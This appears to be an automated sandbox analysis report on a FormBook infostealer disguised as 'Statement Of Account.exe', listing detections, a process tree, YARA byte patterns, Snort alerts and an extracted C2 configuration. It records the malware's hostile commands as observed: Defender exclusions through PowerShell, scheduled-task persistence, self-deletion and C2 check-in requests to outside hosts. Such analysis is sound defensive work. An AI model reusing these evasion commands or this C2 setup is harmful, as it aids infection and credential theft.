
Windows Analysis Report
Statement Of Account.exe

Overview

General Information

Sample name: Statement Of Account.exe
Analysis ID: 1430501
MD5: da68e8ff4e0c0d00c613fa9301cf4a37
SHA1: 7456cf2540dce6403407b532c502ce5abb07e9ec
SHA256: b7def3af905789a4ecedcc226d91592d8bc758ce8c5458d62ef435707de8670f
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: CMSTP Execution Process Creation
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Statement Of Account.exe (PID: 6744 cmdline: "C:\Users\user\Desktop\Statement Of Account.exe" MD5: DA68E8FF4E0C0D00C613FA9301CF4A37)
    • powershell.exe (PID: 7064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5480 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7352 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3760 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7272 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmstp.exe (PID: 7592 cmdline: "C:\Windows\SysWOW64\cmstp.exe" MD5: D7AABFAB5BEFD53BA3A27BD48F3CC675)
          • cmd.exe (PID: 7636 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • colorcpl.exe (PID: 7600 cmdline: "C:\Windows\SysWOW64\colorcpl.exe" MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • SdYCcXyq.exe (PID: 7408 cmdline: C:\Users\user\AppData\Roaming\SdYCcXyq.exe MD5: DA68E8FF4E0C0D00C613FA9301CF4A37)
    • schtasks.exe (PID: 7524 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7572 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Source | Rule | Description | Author | Strings
0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Source | Rule | Description | Author | Strings
14.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
14.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
14.2.RegSvcs.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
14.2.RegSvcs.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
14.2.RegSvcs.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C

System Summary

Source: Process started, Author: Nik Seetharaman, Data: Command: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", CommandLine: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\cmstp.exe", ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 7592, ParentProcessName: cmstp.exe, ProcessCommandLine: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ProcessId: 7636, ProcessName: cmd.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement Of Account.exe", ParentImage: C:\Users\user\Desktop\Statement Of Account.exe, ParentProcessId: 6744, ParentProcessName: Statement Of Account.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe", ProcessId: 7064, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\SdYCcXyq.exe, ParentImage: C:\Users\user\AppData\Roaming\SdYCcXyq.exe, ParentProcessId: 7408, ParentProcessName: SdYCcXyq.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp", ProcessId: 7524, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement Of Account.exe", ParentImage: C:\Users\user\Desktop\Statement Of Account.exe, ParentProcessId: 6744, ParentProcessName: Statement Of Account.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp", ProcessId: 3760, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement Of Account.exe", ParentImage: C:\Users\user\Desktop\Statement Of Account.exe, ParentProcessId: 6744, ParentProcessName: Statement Of Account.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe", ProcessId: 7064, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement Of Account.exe", ParentImage: C:\Users\user\Desktop\Statement Of Account.exe, ParentProcessId: 6744, ParentProcessName: Statement Of Account.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp", ProcessId: 3760, ProcessName: schtasks.exe

Timestamp: 04/23/24-18:44:06.302513
SID: 2031412
Source Port: 49750
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 04/23/24-18:45:09.660568
SID: 2031412
Source Port: 49752
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 04/23/24-18:43:47.456512
SID: 2031412
Source Port: 49748
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 04/23/24-18:44:26.966413
SID: 2031412
Source Port: 49751
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection

Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.lolabeautystudios.com/gs12/"], "decoy": ["juniavilela.com", "italiahealth.club", "freefoodpro.com", "qqmotor.co", "mosahacatering.com", "wocc.club", "tourly360.com", "airzf.com", "eternalknot1008.com", "pons.cc", "zdryueva.com", "bodution.website", "vip8g100013.top", "3box.club", "bestoffersinoneplace.com", "tronbank.club", "hlysh.live", "allfireofferapp.sbs", "goldenvistaservices.com", "theconfidencebl-youprint.com", "doping.digital", "urxetqt.com", "utahdatecoach.com", "coworkingvalencia.pro", "thebeautybarandco.com", "umastyle.club", "demandstudiosnews.com", "k2securityhn.com", "teacakesandtadpoles.com", "epacksystems.network", "y2llvq.vip", "udin88b.us", "simonettipressurewashing.com", "baansbliss.com", "messyplayclub.com", "panaco.co", "kustomequipment.com", "actnowgreen.com", "tallawahyouthfoundation.com", "novistashop.com", "oversight418354.email", "ypsom.info", "enerableoffi.club", "otirugkyt.com", "mappedbyamanda.com", "vibelola.com", "nexelab.com", "zgcple.info", "maiores-veritatis.com", "wonderdread.cloud", "signomo.com", "uspsdirect.shop", "finessebuilding.com", "heavydutywearpart.com", "51win.ink", "b-a-s-e.net", "xianqianjin.fun", "domscott.art", "rtp-tambakslot5000.site", "sports565.com", "kpi-finder.com", "taylor.capital", "1993520.xyz", "hjgd.xyz"]}
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe, ReversingLabs: Detection: 23%
Source: Statement Of Account.exe, ReversingLabs: Detection: 23%
Source: Yara match, File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe, Joe Sandbox ML: detected
Source: Statement Of Account.exe, Joe Sandbox ML: detected
Source: Statement Of Account.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Statement Of Account.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: colorcpl.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1773088883.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1776322578.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1776739813.0000000000860000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: cmstp.pdbGCTL source: RegSvcs.exe, 0000000E.00000002.1776807275.0000000001830000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1770468836.0000000001028000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937098293.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: colorcpl.pdb source: RegSvcs.exe, 00000008.00000002.1773088883.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1776322578.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1776739813.0000000000860000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: RegSvcs.pdb, source: explorer.exe, 00000009.00000002.2955594862.0000000010C3F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937707694.0000000002C6C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2940096728.0000000004EBF000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1770419529.0000000004618000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004970000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1773733976.00000000047C1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1774876929.000000000499D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1772583517.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1770419529.0000000004618000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004970000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1773733976.00000000047C1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1774876929.000000000499D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1772583517.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmstp.pdb source: RegSvcs.exe, 0000000E.00000002.1776807275.0000000001830000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1770468836.0000000001028000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937098293.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: IuBP.pdb source: Statement Of Account.exe, SdYCcXyq.exe.0.dr
Source: Binary string: IuBP.pdbSHA256 source: Statement Of Account.exe, SdYCcXyq.exe.0.dr
Source: Binary string: RegSvcs.pdb source: explorer.exe, 00000009.00000002.2955594862.0000000010C3F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937707694.0000000002C6C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2940096728.0000000004EBF000.00000004.10000000.00040000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4x nop then pop esi, 14_2_00417322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4x nop then pop edi, 14_2_00416CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4x nop then pop edi, 14_2_00417D70

Networking

Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49748 -> 154.12.38.29:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49750 -> 91.195.240.94:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49751 -> 34.149.87.45:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49752 -> 160.124.174.163:80
Source: C:\Windows\explorer.exe, Network Connect: 91.195.240.94 80
Source: C:\Windows\explorer.exe, Network Connect: 154.12.38.29 80
Source: C:\Windows\explorer.exe, Network Connect: 34.149.87.45 80
Source: Malware configuration extractor, URLs: www.lolabeautystudios.com/gs12/
Source: global traffic, HTTP traffic detected: GET /gs12/?r6-=DR9+51rACou4eQBXOdoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpwURv63eY6pg&YN=9rKtZn5 HTTP/1.1 | Host: www.airzf.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /gs12/?r6-=QIIWKxrtyX7LT6NTTkxUIHQxUymhf5FB+GXjykqQ4dPV8mdQoaOANT6/8pJ3wvHey5SR&YN=9rKtZn5 HTTP/1.1 | Host: www.b-a-s-e.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /gs12/?r6-=993VfXh0jqtko3ENU03aV9e2gnwjzkI9tuLx/ah8zkvGCI6r8A517lqbkaAk6P8eMjr8&YN=9rKtZn5 HTTP/1.1 | Host: www.zdryueva.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View, IP Address: 91.195.240.94
Source: Joe Sandbox View, IP Address: 34.149.87.45
Source: Joe Sandbox View, ASN Name: SEDO-ASDE
Source: Joe Sandbox View, ASN Name: UNMETEREDCA
Source: Joe Sandbox View, ASN Name: ATGS-MMD-ASUS
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe, Code function: 9_2_0F904F82 getaddrinfo, setsockopt, recv
Source: unknown, DNS traffic detected: queries for: www.airzf.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=utf-8 | X-Wix-Request-Id: 1713890667.07612762899732525067 | Age: 0 | Server: Pepyaka | X-Content-Type-Options: nosniff | Accept-Ranges: bytes | Date: Tue, 23 Apr 2024 16:44:27 GMT | X-Served-By: cache-chi-kigq8000037-CHI | X-Cache: MISS | Vary: Accept-Encoding | Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_g | Transfer-Encoding: chunked | Via: 1.1 google | Connection: close
          Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
